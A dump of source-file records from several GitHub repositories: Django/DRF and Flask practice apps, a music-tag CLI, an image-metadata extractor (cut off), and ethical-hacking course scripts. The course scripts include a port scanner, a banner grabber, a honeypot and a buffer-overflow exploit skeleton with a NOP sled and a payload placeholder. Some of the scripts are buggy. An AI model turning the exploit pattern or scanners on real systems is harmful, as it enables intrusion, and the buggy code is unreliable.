"text": "from django.db import models\n\nclass Course(models.Model):\n id = models.IntegerField(primary_key=True)\n name = models.CharField(max_length=100, blank=True, null=True)\n description = models.CharField(max_length=300, blank=True, null=True)\n rating = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)\n\n def __str__(self):\n return self.id + \"\" + self.name\n"
},
{
"alpha_fraction": 0.6570796370506287,
"alphanum_fraction": 0.6681416034698486,
"avg_line_length": 44.099998474121094,
"blob_id": "33efb37ee076a0c11b4dc9ce31417e41fa52c94f",
"content_id": "02cc9b90a54daf1b5b4b5ac17da7019e1026f5d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 452,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 10,
"path": "/flighttracker/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Passenger(models.Model):\n id = models.IntegerField(primary_key=True)\n first_name = models.CharField(max_length=25, blank=False, null=False, default='')\n last_name = models.CharField(max_length=25, blank=False, null=False, default='')\n flight_points = models.IntegerField(blank=False, null=False, default=0)\n\n def __str__(self):\n return self.first_name + \" \" + self.last_name\n\n"
},
{
"alpha_fraction": 0.7222222089767456,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 30.375,
"blob_id": "f6ba4a5a7a116a81c4d6811f3012a0c556c57d52",
"content_id": "734f3f0f01a8b53392c3106dc6220e245b0f396c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/flighttracker/serializers.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom flighttracker.models import Passenger\n\nclass PassengerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Passenger\n fields = ['id', 'first_name', 'last_name', 'flight_points']\n\n"
},
{
"alpha_fraction": 0.5510563254356384,
"alphanum_fraction": 0.5713028311729431,
"avg_line_length": 33.42424392700195,
"blob_id": "f1f5226d857d5c889b79610a02523e55ce769f99",
"content_id": "d702e74ddb9b02c1727458548a40e5a8df8e7727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1136,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 33,
"path": "/order/migrations/0001_initial.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-04-02 04:06\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('firstName', models.CharField(max_length=20)),\n ('lastName', models.CharField(max_length=20)),\n ('phone_number', models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('product', models.CharField(max_length=20)),\n ('quantity', models.SmallIntegerField()),\n ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='order.Customer')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.8017751574516296,
"alphanum_fraction": 0.8017751574516296,
"avg_line_length": 32.70000076293945,
"blob_id": "0820da93e084529dd8b3b9ac728f6e7adf4eda9a",
"content_id": "dd8cb19cb47e6bb88f847b9a0e48bcf7b6491070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 20,
"path": "/order/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import generics\n\nfrom .serializers import CustomerSerializer, OrderSerializer\nfrom .models import Customer, Order\n\nclass CustomerListView(generics.ListCreateAPIView):\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n\nclass CustomerDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n\nclass OrderListView(generics.ListCreateAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\nclass OrderDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\n\n"
}
] | 13 |
mikrogravitation/kommandozentrale | https://github.com/mikrogravitation/kommandozentrale | 266661562a055a442ad149a7abddd7b6c48f6fd6 | 762e28f24d89cd39f0ff5a23dc77d0b123cd32b9 | 27550d935882c26ff95a7d5de8e8a26cac30993f | refs/heads/master | 2021-07-01T19:15:46.987964 | 2017-09-20T20:32:24 | 2017-09-20T20:32:24 | 103,864,045 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.624438464641571,
"alphanum_fraction": 0.6379155516624451,
"avg_line_length": 36.099998474121094,
"blob_id": "7f9a2f0cf7e2aa4c5fe7603042091f16eeaa3ac3",
"content_id": "527723ec901d1f164467e33d59760ab28da2ca74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 30,
"path": "/mosquitto/mockup.py",
"repo_name": "mikrogravitation/kommandozentrale",
"src_encoding": "UTF-8",
"text": "import paho.mqtt.client as mqtt\nimport json, struct, random\n\n# Load configuarion\nwith open(\"../web/config.json\") as cfile:\n config = json.load(cfile)\n\n# Called when client is connecteed\ndef on_connect(client, userdata, flags, rc):\n # Go through all rooms\n for room in config[\"rooms\"]:\n # Go through all items\n for item in room[\"items\"]:\n # If item is a light, set on/off randomly\n if item[\"mqtt_id\"].startswith(\"light/\"):\n d = struct.pack('b',random.randint(0,1))\n client.publish(item[\"mqtt_id\"], d, retain=True, qos=1)\n # It item is a music player, set example-values\n elif item[\"mqtt_id\"].startswith(\"mpd/\"):\n client.publish(item[\"mqtt_id\"], '{\"current_song\":\"Test Song\", \"playlist_name\":\"Test Playlist\"}', retain=True, qos=1)\n # Disconnect from client, ending script\n client.disconnect()\n\n# Create client\nclient = mqtt.Client(transport=\"websockets\")\nclient.on_connect = on_connect\n# connect to broker\nclient.connect(\"127.0.0.1\", 9000, 5)\n# wait until client disconnects\nclient.loop_forever()\n"
}
] | 1 |
MKedas/EH496 | https://github.com/MKedas/EH496 | 5f9b20bb2c57485f72abcab2fb70c4bcc13f1a9b | d961a1f3e980e41f6194044bafe83f820c3f5b7c | 96c1afc48bb3037bdce584ea8b4434e8cf5ba3b0 | refs/heads/master | 2021-01-10T17:00:34.794788 | 2015-05-22T18:32:14 | 2015-05-22T18:32:14 | 36,088,837 | 0 | 1 | null | 2015-05-22T18:32:38 | 2015-05-22T18:32:42 | 2015-05-22T18:32:42 | Python | [
{
"alpha_fraction": 0.6373626589775085,
"alphanum_fraction": 0.6465201377868652,
"avg_line_length": 21.75,
"blob_id": "723aa3251be7911df5f357ff2e5b95980f7970dc",
"content_id": "6f230cf56a85f6495aa3f0a0652d0dddd4023f10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 24,
"path": "/honeypot.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\nimport sys\nfrom time import gmtime, strftime\n\ntimestamp = datetime.now()\n\ndef main():\n\n\tsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #Arguement 1 = IP Address of Host\n #Arguement 2 = Port number\n \tsock.bind((sys.argv[1],int(sys.argv[2])))\n \t#Up to five people can connect\n sock.listen(5)\n\twhile True:\n\t\tc,addr = s.accept()\n\t\tc.send(\"Opps.\")\n print \"Time of Incident :\", timestamp\n\t\tprint \"%s on port %i has connected.\" % (addr)\n\t\tsys.stdout.write(\"\\a\")\n\t\tsys.stdout.flush()\n\t\tc.close()\n\nmain()\n"
},
{
"alpha_fraction": 0.4771480858325958,
"alphanum_fraction": 0.47806215286254883,
"avg_line_length": 44.58333206176758,
"blob_id": "9eb7de2163c9c65e015ac6990d11cccbfdc5f152",
"content_id": "73165ba05df1158451c5835738fa2f8a2b0bfa86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 24,
"path": "/ipRange.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "#Simple ip range script that outputs all\n#possible host IP addresses into an array\n\ndef iprange(network, starthostip, stophostip):\n tempiplist = []\n for i in range (starthostip,stophostip+1):\n tempiplist.append(\"%s.%i\" % (network , i))\n return tempiplist\n\ndef main():\n iplist = []\n network = raw_input('Enter your network prefix: ')\n starthostip = int(raw_input('Start range from address %s.' % network))\n stophostip = int(raw_input('Ending range at address %s.' % network))\n print \"*******************************************************\"\n print \"* Your network is %s *\" % network\n print \"*_____________________________________________________*\"\n print \"* Your starting IP %s.%i *\" % (network,starthostip)\n print \"*_____________________________________________________*\"\n print \"* Your ending IP will be %s.%i *\" % (network,stophostip)\n print \"*******************************************************\"\n iplist = iprange(network, starthostip, stophostip)\n print iplist\nmain()\n"
},
{
"alpha_fraction": 0.5242140889167786,
"alphanum_fraction": 0.5310110449790955,
"avg_line_length": 23.52083396911621,
"blob_id": "5bb72c9f732099593d0b8b90b53200d2e5f711c6",
"content_id": "910e8cd0a2ce8fe192c02038dd161dd623b6136b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1177,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 48,
"path": "/portscanner.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket, subprocess, sys\nfrom datetime import datetime\n\nhostIP = socket.gethostbyname(sys.argv[1])\n\nstartTime = datetime.now()\t\t\t# Time the scan starts\n\n\n\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\nprint\"\"\nprint\" S C A N N I N G . . . \"\nprint\"\"\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\n\n\ntry:\n\t#Checks all ports in this range\n for scan_port in range(1,10000):\n\n\t\t#socket, protocol\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\t\tresult = s.connect_ex((hostIP, scan_port))\n\n\t\tif result == 0:\n print \"Port {}: \\t Open\".format(scan_port)\n s.close()\n\n#Error: Checks for address-related errors\nexcept socket.gaierror:\n print \"Couldn't find host\"\n sys.exit()\n\n#Error: Checks for socket-related errors\nexcept socket.error:\n print \"Couldn't connect to server\"\n sys.exit()\n\n#calculates the time for scan to complete\nendTime = datetime.now()\ntotalTime = endTime - startTime\n\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\nprint\" \"\nprint\" SCAN COMPLETED IN : *\", totalTime\nprint\" \"\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\n"
},
{
"alpha_fraction": 0.621730387210846,
"alphanum_fraction": 0.6458752751350403,
"avg_line_length": 21.590909957885742,
"blob_id": "494f7aa72aad2eec6b7e6aa049a1e8ca52c8182f",
"content_id": "f53dedf89e5424f8155f52c19ba1bfe90ed81e12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 22,
"path": "/bannergrabber.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\n\ndef main():\n\taddress = sys.argv[1]\n\tport = int(sys.argv[2])\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((address,port))\n\ts.send(\"Hello\")\n\tmessage = s.recv(4096)\n\tmyhexdump(message)\n\ndef myhexdump(src):\n\tlength = 16\n\tresult = []\n\tfor i in range(0,len(src),length):\n\t\tsubstring = src[i:i+length]\n\t\tresult.append(\"%04X \" % i)\n\t\thex = ''.join(\"%X\" % ord(c) for c in substring)\n\t\tresult.append(\"%-*s %s\\n\" % (length*3,hex,substring))\n\tprint b''.join(result)\n\nmain()\n"
},
{
"alpha_fraction": 0.6235294342041016,
"alphanum_fraction": 0.6509804129600525,
"avg_line_length": 17.214284896850586,
"blob_id": "77f76b2c1c13ea97f8d51c3a00fa48c35553e6cb",
"content_id": "97588bf132dfc98f9d4a5ecf375ad7b2c20f4a03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 14,
"path": "/bannerServer.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\n\ndef main():\n\tprint \"What message would you like to send?\"\n\tmsg = str(raw_input())\n\ts=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.bind((\"0.0.0.0\",54))\n\ts.listen(5)\n\twhile True:\n\t\tc,addr = s.accept()\n\t\tc.send(msg)\n\t\tc.close()\n\nmain()\n"
},
{
"alpha_fraction": 0.6491228342056274,
"alphanum_fraction": 0.6710526347160339,
"avg_line_length": 34.07692337036133,
"blob_id": "9e63baa6bfe87e199fc4e22ad59d64f22ddd0607",
"content_id": "c7a4dacd6396b702c610a4bbe51bfe513180765b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 456,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 13,
"path": "/vulnserver_exploit.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "# VulnServer Exploit\n\nimport socket, sys\n\nip = sys.argv[1] # host IP\nport = int(sys.argv[2]) # Port of vulnerable application\ncmd = sys.argv[3] #\n\ngarbage = \"A\"*151 # garbage data to send\n\nnop_sled = \"\\x90\"*32 # assembly instruction that does nothing; can be overridden by payload if necessary\npayload = # use msfpayload to generate a payload depending on the exploit\nexploit = garbage + redir_inst + nop_sled + payload\n"
}
] | 6 |
imjenn/login-registration | https://github.com/imjenn/login-registration | 9ee62e945b06c21437595e37118107015875c5c2 | 131426e2e549efc0730114b1b1e24abf50de0604 | c97d64213ac280272b3919ce8b207b6ea6e34a4b | refs/heads/main | 2023-08-26T21:44:24.025279 | 2021-10-31T00:17:00 | 2021-10-31T00:17:00 | 423,017,501 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 20,
"blob_id": "56ba704b87aa31d9c1bd494c339a46235c5d43d4",
"content_id": "9b0dfde6c4bd36bf7e128c75f7a62acb6a4e1a16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "# login-registration\n"
},
{
"alpha_fraction": 0.573803722858429,
"alphanum_fraction": 0.5794809460639954,
"avg_line_length": 33.26388931274414,
"blob_id": "803edbec606c215f20dcb775600a61929b33360e",
"content_id": "06f3d6aed195e74d97656517199318f11b328d17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2466,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 72,
"path": "/flask_app/models/user.py",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "#import the function that will return an instance of a connection\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nimport re \n\n# regex object\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\nclass User:\n def __init__( self, data ):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email = data['email']\n self.password = data['password']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n # Class methods to query db\n\n # C - Create\n @classmethod\n def create(cls, data):\n query = \"INSERT INTO users (first_name, last_name, email, password) VALUES ( %(first_name)s, %(last_name)s, %(email)s, %(password)s);\"\n return connectToMySQL('login').query_db(query, data)\n\n # R - Read/Retrieve all\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM users;\"\n results = connectToMySQL('login').query_db(query)\n all_users = []\n for user in results:\n all_users.append(cls(user))\n return all_users\n\n @classmethod\n def get_by_email(cls,data):\n query = \"SELECT * FROM users WHERE email = %(email)s;\"\n results = connectToMySQL('login').query_db(query,data)\n if len(results) < 1:\n return False\n return cls(results[0])\n\n # R - Read/Retrieve one\n @classmethod\n def get_by_id(cls, data):\n query = \"SELECT * FROM users WHERE id=%(id)s;\"\n results = connectToMySQL('login').query_db(query, data)\n return cls(results[0])\n\n # Regex static method\n @staticmethod\n def is_valid(user):\n is_valid = True\n query = \"SELECT * FROM users WHERE email = %(email)s;\"\n results = connectToMySQL('login').query_db(query,user)\n if len(results) >= 1:\n flash(\"Email already taken.\")\n is_valid=False\n if not EMAIL_REGEX.match(user['email']):\n flash(\"Invalid Email\")\n is_valid=False\n if len(user['first_name']) < 3:\n flash(\"First name must be at least 3 characters\",\"register\")\n is_valid= False\n if len(user['last_name']) < 3:\n flash(\"Last name must be at least 3 characters\",\"register\")\n is_valid= False\n if user['pw1'] != user['pw2']:\n flash(\"Passwords do not match.\")\n return is_valid"
},
{
"alpha_fraction": 0.6179875135421753,
"alphanum_fraction": 0.62199467420578,
"avg_line_length": 27.80769157409668,
"blob_id": "f2436625aad105fea36cf4e2c1d37084a4508668",
"content_id": "f5cd2a0a0b9e0a941b9dbe6b874d318ea5aad8a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2246,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 78,
"path": "/flask_app/controllers/users.py",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, session, flash\nfrom flask_app import app\nfrom flask_app.models.user import User\nimport re\n\nfrom flask_bcrypt import Bcrypt\nbcrypt = Bcrypt(app)\n\nr_p = re.compile('^(?=\\S{6,20}$)(?=.*?\\d)(?=.*?[a-z])(?=.*?[A-Z])')\n\[email protected]('/')\ndef index():\n all_users = User.get_all()\n return render_template(\"index.html\", all_users=all_users)\n\n# Action route\[email protected]('/register', methods=['POST'])\ndef register():\n # Validate first\n user_dict = request.form.to_dict()\n if not User.is_valid(request.form):\n return redirect('/')\n\n if not r_p.match(user_dict['pw1']):\n flash(\"Password be at least 6 characters, include a digit number, and at least an uppercase and lowercase letter.\")\n return redirect('/')\n\n # Bcrypt\n pw_hash = bcrypt.generate_password_hash(request.form['pw1'])\n print(pw_hash)\n data = {\n \"first_name\": request.form['first_name'],\n \"last_name\": request.form['last_name'],\n \"email\": request.form['email'],\n \"password\": pw_hash\n }\n \n user_id = User.create(data)\n print(user_id)\n session['user_id'] = user_id\n return redirect(\"/dashboard\")\n\[email protected]('/login', methods=['POST'])\ndef login():\n user_in_db = User.get_by_email(request.form)\n\n # if user is not in db\n if not user_in_db:\n flash(\"Invalid email/password\")\n return redirect(\"/\")\n if not bcrypt.check_password_hash(user_in_db.password, request.form['password']):\n # If we get false after checking the pw\n flash(\"Invalid email/password\")\n return redirect(\"/\")\n # if pws matched, we set the user_id into session\n session['user_id'] = user_in_db.id\n return redirect(\"/dashboard\")\n\n# User page after successful login\[email protected]('/dashboard')\ndef display():\n if 'user_id' not in session:\n return redirect('/logout')\n data = {\n 'id' : session['user_id']\n }\n return render_template(\"dashboard.html\")\n\[email protected]('/logout')\ndef logout():\n session.clear()\n return redirect(\"/\")\n\n# If user enter in any other path\n# @app.route(\"/\", defaults=['path': ''])\n# @app.route('/<path:path>')\n# def catch_all(path):\n# return 'Error 404 page not found'"
}
] | 3 |
amirashabani/mo | https://github.com/amirashabani/mo | 0e8b88a7bb3bea559b76d92fe92747422ce799ad | 827e1ece4bcca48aa6685e659ae91d68a6a25e8a | 04658b991eb66f8f16a961bada86f614550971f7 | refs/heads/master | 2021-06-30T04:50:59.302155 | 2020-01-21T03:32:59 | 2020-01-21T03:32:59 | 229,165,932 | 0 | 0 | null | 2019-12-20T01:18:04 | 2020-01-21T03:38:59 | 2021-06-02T00:54:22 | Python | [
{
"alpha_fraction": 0.5206431746482849,
"alphanum_fraction": 0.5302042365074158,
"avg_line_length": 25.744186401367188,
"blob_id": "b75310d4a8a952e8345f94a09f4445e64e9f96e1",
"content_id": "ab1db9ccde47584820790f48dfd60edbe610736a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2301,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 86,
"path": "/mo.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "import sys, github\nfrom mutagen.easyid3 import EasyID3\nfrom colorama import Fore, Style, init\n\ndef latest(args):\n if len(args) == 1:\n print(\"Show latest what, exactly?\")\n exit(1)\n else:\n method = args[1]\n\n if method == \"version\":\n print(github.version())\n\ndef version(args):\n print(github.version())\n\ndef tags(args):\n if len(args) == 1:\n print(f\"Show {Fore.BLUE}{args[0]}{Style.RESET_ALL} for which audio, exactly?\")\n exit(1)\n else:\n method = args[0]\n filepath = args[1]\n\n try:\n audio = EasyID3(filepath)\n except Exception:\n print(\"I can't read that audio, are you sure you provided the path correctly?\")\n exit(1)\n\n if method == \"tags\":\n brief_statement = []\n brief_tags = [\"artist\", \"title\", \"album\", \"genre\", \"date\"]\n for tag in brief_tags:\n try:\n brief_statement.append(f\"{Fore.BLUE}{tag}:{Style.RESET_ALL} {audio[tag][0]}\")\n except Exception:\n brief_statement.append(f\"{Fore.BLUE}{tag}:{Fore.RED} can't find it.{Style.RESET_ALL}\")\n print('\\n'.join(brief_statement))\n else:\n try:\n print(audio[method][0])\n except Exception:\n print(f\"I can't find {Fore.BLUE}{method}{Style.RESET_ALL} from that audio.\")\n\ndef show(args):\n actions = {\n \"tags\": tags,\n \"artist\": tags,\n \"title\": tags,\n \"album\": tags,\n \"genre\": tags,\n \"date\": tags,\n \"version\": version,\n \"latest\": latest\n }\n if len(args) == 0:\n print(\"Show what, exactly?\")\n exit(1)\n else:\n action = args[0]\n if action in actions:\n actions[action](args)\n else:\n print(f\"I haven't been trained to show {Fore.RED}{action}{Style.RESET_ALL}.\")\n exit(1)\n\ndef main():\n init()\n args = sys.argv\n actions = {\n \"show\": show\n }\n if len(args) == 1:\n print(f\"{Fore.MAGENTA}MO, the Musicophile Owl!{Style.RESET_ALL}\")\n else:\n action = args[1]\n if action in actions:\n actions[action](args[2:])\n else:\n print(f\"I haven't been trained to {Fore.RED}{action}{Style.RESET_ALL}.\")\n exit(1)\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.7766990065574646,
"alphanum_fraction": 0.8058252334594727,
"avg_line_length": 24.75,
"blob_id": "c523c2611e3b3fc8efa997e503202efd302e23f0",
"content_id": "cb0006e153718f29ff421c3824ebc80f5f8d420f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 4,
"path": "/misc/mutagen_generate_valid_keys.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "from pprint import pprint\nfrom mutagen.easyid3 import EasyID3\n\npprint(list(EasyID3.valid_keys.keys()))\n"
},
{
"alpha_fraction": 0.6722221970558167,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 24.64285659790039,
"blob_id": "4e13d4d5522b1e4e38a1485307ca20488994069f",
"content_id": "dbdbdd1654279822e817e8dd790242e2976cbfa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 14,
"path": "/github.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "import requests\nfrom dateutil import parser\n\ndef version():\n repository = \"https://api.github.com/repos/amirashabani/mo/commits/master\"\n\n response = requests.get(repository).json()\n\n last_commit = response[\"commit\"][\"author\"][\"date\"]\n\n # last_commit_parsed\n lcp = parser.parse(last_commit)\n\n return f\"{lcp.year}.{lcp.month:02}.{lcp.day:02}\"\n\n"
},
{
"alpha_fraction": 0.48868778347969055,
"alphanum_fraction": 0.7104072570800781,
"avg_line_length": 16,
"blob_id": "f8489d23657903d325da9a001d2b3fa9750f177e",
"content_id": "9da9684401ccf0eaf8c1321dffe5d5b8fc8cfa77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "altgraph==0.16.1\nbeautifulsoup4==4.6.0\ncertifi==2019.11.28\nchardet==3.0.4\ncolorama==0.4.3\nidna==2.8\nlyricsgenius==1.8.2\nmutagen==1.43.0\nPyInstaller==3.6\npython-dateutil==2.8.1\nrequests==2.22.0\nsix==1.14.0\nurllib3==1.25.7\n"
},
{
"alpha_fraction": 0.7255717515945435,
"alphanum_fraction": 0.7422037124633789,
"avg_line_length": 21.904762268066406,
"blob_id": "020d10745c1fbc30c854ca28b3f2bb522f94afed",
"content_id": "7e4fdb98a21eb969186d2f9efa0b740cc13e5296",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 21,
"path": "/genius_lyrics.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "from lyricsgenius import Genius\nfrom colorama import init, Fore, Style\nfrom mutagen.easyid3 import EasyID3\nfrom genius_tokens import CLIENT_ACCESS_TOKEN\nimport sys\n\nargs = sys.argv\n\nif len(args) == 1:\n print(\"Specify path to audio\")\n exit(1)\n\naudio_path = args[1]\naudio = EasyID3(audio_path)\n\ngenius = Genius(CLIENT_ACCESS_TOKEN)\ngenius.verbose = False\ngenius.remove_section_headers = True\nsong = genius.search_song(audio[\"title\"][0], audio[\"artist\"][0])\n\nprint(song.lyrics)\n"
}
] | 5 |
sour-barm/cellar_door-project | https://github.com/sour-barm/cellar_door-project | 503f4aa93f59938ce8320c85eaceaddfcbb8a064 | 9f6c7cdd8b0b8b9c251137cbc5023ab4831301d6 | 31f8ee003c35694972b94ede3a28681da381ec43 | refs/heads/master | 2022-11-10T23:09:16.893425 | 2018-09-29T19:35:23 | 2018-09-29T19:35:23 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5084299445152283,
"alphanum_fraction": 0.514488935470581,
"avg_line_length": 26.507246017456055,
"blob_id": "d85e839a209cb67f713ea69f83a8a6abe35328ab",
"content_id": "6e8d686c73183158c66912d2d5af2e4069a8e48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3796,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 138,
"path": "/cellar_door",
"repo_name": "sour-barm/cellar_door-project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport PIL.Image\nimport argparse\nimport os\nimport glob\nfrom sys import exit, argv\nfrom PIL.ExifTags import TAGS\n\nsupport = ['.jpg', '.jpeg', '.JPG', '.JPEG']\n__ver__ = 0.2\n__author__ = \"Plutonium\"\n__thanks__ = [ 'Dark Hole' ]\n\nstack = []\ndef get_metadata(img):\n if not os.access(img, os.R_OK):\n return False\n image = PIL.Image.open(img)\n data = image._getexif()\n ret = list()\n try:\n for key in data.keys():\n ret.append(key)\n ret.append(data[key])\n except AttributeError:\n ret = list()\n ret.append(image.size)\n ret.append(image.format)\n ret.append(image.mode)\n return ret\n\n#welcome to the rice fields, motherfucker\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file', required=False, help='file')\n parser.add_argument(\n '-d', '--dir', required=False, help='dir to search and research files')\n parser.add_argument('-i', '--info', required=False, default=False,\n action=\"store_true\", dest='info', help=\"info about programm\")\n args = parser.parse_args()\n if args.info != False:\n print(\"ver: \" + str(__ver__))\n print(\"author: \" + __author__)\n print(\"supported photo formats: \" + str(support))\n exit(0)\n if len(argv) < 2:\n print('[-]nothing to do!')\n exit(0)\n files = list()\n global stack\n if args.dir != None:\n if args.dir[:-1] != '/':\n args.dir += '/'\n i = 0\n while i < len(support):\n a = []\n a = glob.glob(args.dir + '*' + support[i])\n files += a\n b = 0\n while b <= len(a):\n stack.append(support[i])\n b = b + 1\n i = i + 1\n #add here another while if there are more types than in support\n else:\n ext = os.path.splitext(args.file)[1]\n files.append(args.file)\n stack.append(ext[:-4])\n return files, stack\n\ndef type_photo(files):\n try:\n data = get_metadata(files)\n except AttributeError:\n print('[-] error getting metadata at file:' + files)\n return\n if data == False:\n print('[-] error opening file:' + files)\n print(files)\n print('mode:' + str(data.pop()))\n print('format:' + str(data.pop()))\n print('resolution:' + str(data.pop()))\n if data == None or len(data) == 0:\n print('[-] no metadata in photo:' + files)\n else:\n print('[*] metadata:')\n try:\n while data != None:\n a = data.pop()\n tag = TAGS[data.pop()]\n print(tag + ' : ' + str(a))\n except:\n return\n return\n \n#I love the smell of napalm in the morning.\ndef is_rarjpeg(fil):\n f = open(fil, 'rb')\n buff = f.read()\n f.close()\n if (len(buff) - buff.find(b'\\xff\\xd9') - 2 == 0):\n return False\n else:\n return True\n\ndef get_rarjpeg(fil):\n f = open(fil, 'rb')\n buff = f.read()\n f.close()\n i = buff.find(b'\\xff\\xf9')\n w = open(fil + '.cellar_door', 'wb')\n w.write(buff[i + 